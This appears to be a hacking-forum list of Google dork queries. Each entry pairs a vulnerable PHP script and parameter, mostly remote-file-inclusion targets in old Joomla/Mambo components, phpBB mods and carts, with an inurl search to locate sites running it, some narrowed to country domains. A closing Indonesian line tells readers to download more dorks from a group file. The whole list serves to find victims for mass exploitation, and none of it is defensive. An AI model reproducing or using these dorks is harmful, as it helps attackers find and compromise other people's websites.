! Scan index.php? R = inurl: "index.php? R =*. php"
! Scan index.php? Menu = inurl: "net / index.php? Menu =*. php"
! Scan index.php? Pag = inurl: "com / index.php? Pag =*. php"
! Scan solpot.html? Body = allinurl: "solpot.html? Body"
! Scan port.php? Content = inurl: port.php? Content =*. php "
! Scan index0.php? Show = inurl: index0.php? Show =*. php "
! Scan administrator / components / com_comprofiler / plugin.class.php? MosConfig_absolute_path = inurl: / index.php? Option = com_comprofiler "
! Scan / tools / send_reminders.php? Includedir = allinurl: day.php? Date = inurl: / day.php? Date =
! Scan administrator / components / com_remository / admin.remository.php? MosConfig_absolute_path = inurl: / index.php? Option = com_remository
! Scan / tags.php? BBCodeFile = intitle: "Tagger LE" inurl: tags.php site: br
! Scan administrator / components / com_comprofiler / plugin.class.php? MosConfig_absolute_path = inurl: / index.php? option = com_comprofiler "
! Scan content.php? Page = inurl: "* content.php? Page =*. php"
! Scan index.php? Topic = inurl: "/ index.php? Topic =*. php"
! Scan index.php? U = inurl: "/ index.php? U =*. php"
! Scan administrator / components / com_linkdirectory / toolbar.linkdirectory.html.php? MosConfig_absolute_path = inurl: "com_linkdirectory"
! Scan administrator / components / com_cropimage / admin.cropcanvas.php? Cropimagedir = inurl: ".tr. / components"
! Scan modules / My_eGallery / index.php? BasePath = inurl: "My_eGallery"
! Scan / modules / vwar / admin / admin.php? Vwar_root = inurl: "vwar"
! Scan index.php? Loc = allinurl: .br / index.php? Loc =
! Scan administrator / components / com_comprofiler / plugin.class.php? MosConfig_absolute_path = inurl: "us / index.php? option = com_comprofiler"
! Scan administrator / components / com_cropimage / admin.cropcanvas.php? Cropimagedir = inurl: "com_cropimage"
! Scan / tags.php? BBCodeFile = intitle: "Tagger LE" inurl: tags.php
! Scan myevent.php? Myevent_path = inurl: myevent.php
! Scan / administrator / components / com_uhp / uhp_config.php? MosConfig_absolute_path = allinurl: "com_uhp"
! Scan myevent.php? Myevent_path = inurl: "uk / myevent.php
! Scan includes / functions.php? Phpbb_root_path = powered by Integramod
! Scan m2f/m2f_phpbb204.php? M2f_root_path = allinurl: / m2f_usercp.php?
! Scan / tags.php? BBCodeFile = intitle: "Tagger LE" inurl: "uk / tags.php
! Scan administrator / components / com_remository / admin.remository.php? MosConfig_absolute_path = inurl: "us / index.php? Option = com_remository
! Scan show.php? Path = inurl: fclick
! Scan show.php? Path = inurl: .ac.uk / fclick
! Scan administrator / components / com_linkdirectory / toolbar.linkdirectory.html.php? MosConfig_absolute_path = inurl: ". De .* / com_linkdirectory"
! Scan administrator/components/com_a6mambocredits/admin.a6mambocredits.php? MosConfig_live_site = inurl: "com_a6mambocredits"
! Scan index.php? Template = inurl: "index.php?"
! Scan search.php? Cutepath = inurl: "search.php?"
! Scan show_news.php? Cutepath = inurl: "show_news.php?"
! Scan page.php? Doc = allinurl: "page.php? Doc = '
! Scan administrator / components / com_webring / admin.webring.docs.php? Component_dir = inurl: "com_webring"
! Scan administrator / components / com_mgm / help.mgm.php? MosConfig_absolute_path = inurl: ". de .* / com_mgm"
! Scan help.php? Css_path = inurl: phplive site:. Ru
! Scan components / com_galleria / galleria.html.php? MosConfig_absolute_path = inurl: "com_galleria /"
! Scan big.php? Pathtotemplate = inurl: ". De .*" big.php? "
! Scan includes / search.php? GlobalSettings [templatesDirectory] = inurl: ". Com" search.php? "
! Scan internal / tiny_mce / plugins / ibrowser / ibrowser.php? TinyMCE_imglib_include = "Papoo CMS"
! Scan / functions.php? Include_path = "powered by: phpecard"
! Scan modules / My_eGallery / index.php? BasePath = inurl: ". De .*" My_eGallery "
! Scan components / com_galleria / galleria.html.php? MosConfig_absolute_path = inurl: ". Net .*" com_galleria / "
! Scan / includes / orderSuccess.inc.php? Glob = 1 & cart_order_id = 1 & glob [rootDir] = "Powered by CubeCart 3.0.6"
! Scan / class.mysql.php? Path_to_bt_dir = "powered by paBugs 2.0 Beta 3"
! Scan / include / footer.inc.php? _AMLconfig [Cfg_serverpath] = "powered by AllMyLinks"
! Scan / squirrelcart / cart_content.php? Cart_isp_root = allinurl: / squirrelcart /
! Scan index2.php? To = inurl: "/ index2.php? To =*. php"
! Scan index.php? Load = inurl: "/ index.php? Load =*. php"
! Scan home.php? Pagina = inurl: "home.php? Pagina ="
! Scan / modules / Coppermine / include / init.inc.php? CPG_M_DIR = allinurl: modules.php? Name = Coppermine
! Scan / modules / Forums / admin / admin_styles.php? Phpbb_root_path = allinurl: modules.php? Name = forums
! Scan / modules / vwar / admin / admin.php? Vwar_root = allinurl: modules.php? Name = vwar
! Scan / modules/PNphpBB2/includes/functions_admin.php? Phpbb_root_path = allinurl: modules.php? name = PNphpBB2
! Scan / modules / My_eGallery / public / displayCategory.php? BasePath = allinurl: modules.php? Name = my_egallery
! Scan / modules / xgallery / upgrade_album.php? GALLERY_BASEDIR = allinurl: modules.php? Name = xgallery
! Scan / modules/4nAlbum/public/displayCategory.php? BasePath = allinurl: modules.php? Name = 4nAlbum
! Scan / include / write.php? Dir = allinurl: / zboard / zboard.php
! Scan db.php? Path_local = inurl: "db.php? Path_local ="
! Scan index.php? Site = inurl: "index.php? Site ="
! Scan index.php? Url = inurl: "index.php? Url ="
! Scan index.php? P = inurl: "index.php? P ="
! Scan index.php? Openfile = inurl: "index.php? Openfile ="
! Scan index.php? File = inurl: "index.php? File ="
! Scan index.php? Go = inurl: "index.php? go ="
! Scan index.php? Content = inurl: "index.php? Content ="
! Scan index.php? Side = inurl: "index.php? Side ="
! Scan index.php? Kobr = inurl: "index.php? Kobr =" index.php? Pg = inurl: "index.php? Pg ="
! Scan index.php? Doc = inurl: "index.php? Doc = '
! Scan index.php? L = inurl: "index.php? L ="
! Scan index.php? A = inurl: "index.php? a ="
! Scan index.php? Principal = inurl: "index.php? Principal ="
! Scan index.php? Show = inurl: "index.php? Show ="
! Scan index.php? Opcao = inurl: "index.php? Opcao ="
! Scan index.php? Conteudo = inurl: "index.php? Conteudo ="
! Scan index.php? Meio = inurl: "index.php? Meio ="
! Scan index.php? Inc = inurl: "index.php? Inc ="
! Scan index.php? C = inurl: "index.php? C ="
! Scan index.php? Rage = inurl: "index.php? Rage ="
! Scan index.php? Arquivo = inurl: "index.php? Arquivo ="
! Scan index.php? Nic = inurl: "index.php? Nic ="
! Scan index.php? X = inurl: "index.php? X ="
! Scan components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php? MosConfig_absolute_path = inurl: "com_mtree"
! Scan index.php? Place = inurl: "index.php? Place ="
! Scan index.php? Show = inurl: "index.php? Show ="
! Scan index.php? Dsp = inurl: "index.php? Dsp ="
! Scan index.php? Dept = inurl: "index.php? Dept ="
! Scan index.php? Lg = inurl: "index.php? Lg ="
! Scan index.php? Inhalt = inurl: "index.php? Inhalt ="
! Scan index.php? Ort = inurl: "index.php? Ort ="
! Scan index.php? Select = inurl: "index.php? Select ="
! Scan principal.php? Conteudo = inurl: "principal.php? Conteudo ="
! Scan main.php? Site = inurl: "main.php? Site ="
! Scan template.php? Pagina = inurl: "template.php? Pagina ="
! Scan contenido.php? Sec = inurl: "contenido.php? Sec ="
! Scan index_principal.php? Pagina = inurl: "index_principal.php? Pagina ="
! Scan template.php? Name = inurl: "template.php? Name ="
! Scan forum.php? Act = inurl: "forum.php? Act ="
! Scan home.php? Action = inurl: "home.php? Action ="
! Scan home.php? Pagina = inurl: "home.php? Pagina ="
! Scan noticias.php? Arq = inurl: "noticias.php? Arq ="
! Scan main.php? X = inurl: "main.php? X ="
! Scan main.php? Page = inurl: "main.php? page ="
! Scan default.php? Page = inurl: "default.php? Page ="
! Scan index.php? Cont = inurl: "index.php? Cont ="
! Scan index.php? ConfigFile = inurl: "index.php? ConfigFile ="
! Scan index.php? Meio.php = inurl: "index.php? Meio.php ="
! Scan index.php? Include = inurl: "index.php? Include ="
! Scan index.php? Open = inurl: "index.php? open =
! Scan index.php? Visualizar = inurl: "index.php? Visualizar ="
! Scan index.php? X = inurl: "index.php? X ="
! Scan index.php? Pag = inurl: "index.php? Pag ="
! Scan index.php? Cat = inurl: "index.php? Cat ="
! Scan index.php? Action = inurl: "index.php? Action ="
! Scan index.php? Do = inurl: "index.php? Do ="
! Scan index2.php? X = inurl: "index2.php? X ="
! Scan index2.php? Content = inurl: "index2.php? Content ="
! Scan main.php? Pagina = inurl: "main.php? Pagina ="
! Scan index.phpmain.php? X = inurl: "index.phpmain.php? X ="
! Scan index.php? Link = inurl: "index.php? Link ="
! Scan index.php? Canal = inurl: "index.php? Canal ="
! Scan index.php? screen = inurl: "index.php? screen ="
! Scan index.php? Langc = inurl: "index.php? Langc ="
! Scan services.php? Page = inurl: "services.php? Page ="
! Scan htmltonuke.php? Filnavn = inurl: "htmltonuke.php? Filnavn ="
! Scan ihm.php? P = inurl: "ihm.php? P ="
! Scan default.php? Page = inurl: "default.php? Page ="
! Scan folder.php? Id = inurl: "folder.php? id ="
! Scan index.php? Load = inurl: "index.php? Load ="
! Scan index.php? Language = inurl: "index.php? Language ="
! Scan hall.php? File = inurl: "hall.php? File ="
! Scan hall.php? Page = inurl: "hall.php? Page ="
! Scan template.php? Goto = inurl: "template.php? Goto ="
! Scan video.php? Content = inurl: "video.php? Content ="
! Scan pages.php? Page = inurl: "pages.php? Page ="
! Scan print.php? Page = inurl: "print.php? Page ="
! Scan show.php? Page = inurl: "show.php? Page ="
! Scan view.php? Page = inurl: "view.php? Page ="
! Scan media.php? Page = inurl: "media.php? Page ="
! Scan index1.php? Choix = inurl: "index1.php? Choix ="
! Scan index1.php? Menu = inurl: "index1.php? menu"
! Scan index.php? Ort = inurl: "index.php? Ort ="
! Scan index2.php? Showpage = inurl: "index2.php? Showpage ="
! Scan index2.php? Ascii_seite = inurl: "index2.php? Ascii_seite ="
! Scan index2.php? DoAction = inurl: "index2.php? DoAction ="
! Scan index2.php? ID = inurl: "index2.php? ID ="
! Scan index2.php? Url_page = inurl: "index2.php? url_page ="
! Scan index1.php? Dat = inurl: "index1.php? Dat ="
! Scan index1.php? Site = inurl: "index1.php? Site ="
! Scan index0.php? Show = inurl: "index0.php? Show ="
! Scan home.php? Content = inurl: "home.php? Content ="
! Scan port.php? Content = inurl: "port.php? Content ="
! Scan main.php? Link = inurl: "main.php? Link ="
! Scan home.php? X = inurl: "home.php? X ="
! Scan index1.php? X = inurl: "index1.php? X ="
! Scan index2.php? X = inurl: "index2.php? X ="
! Scan main.php? X = inurl: "main.php? X ="
! Scan homepage.php? Cell = inurl: "homepage.php? Cell ="
kalou suka unduh aja di file Grup -_- dan masih banya lagi cara menyetel dork nya teman-teman